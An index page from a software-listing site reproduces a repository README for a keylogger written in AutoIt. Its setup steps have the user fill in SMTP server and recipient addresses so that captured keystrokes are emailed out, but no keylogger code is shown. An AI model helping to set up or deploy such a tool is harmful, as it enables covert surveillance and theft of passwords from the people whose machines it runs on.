An open API service indexing awesome lists of open source software.

https://github.com/baorv/keylogger

Keylogger wrote by AutoIT
https://github.com/baorv/keylogger

autoit baorv keylogger

Last synced: 11 months ago
JSON representation

Keylogger wrote by AutoIT

Awesome Lists containing this project

README

          

# AutoIT keylogger

Keylogger wrote in AutoIT

## Installation
Open [keylogger.au3](keylogger.au3) and edit content of file
```au3
$SmtpServer = ""
$FromName = ""
$FromAddress = ""
$ToAddress = ""
$Subject = ""
$Body = ""
```
## Run

Just build and run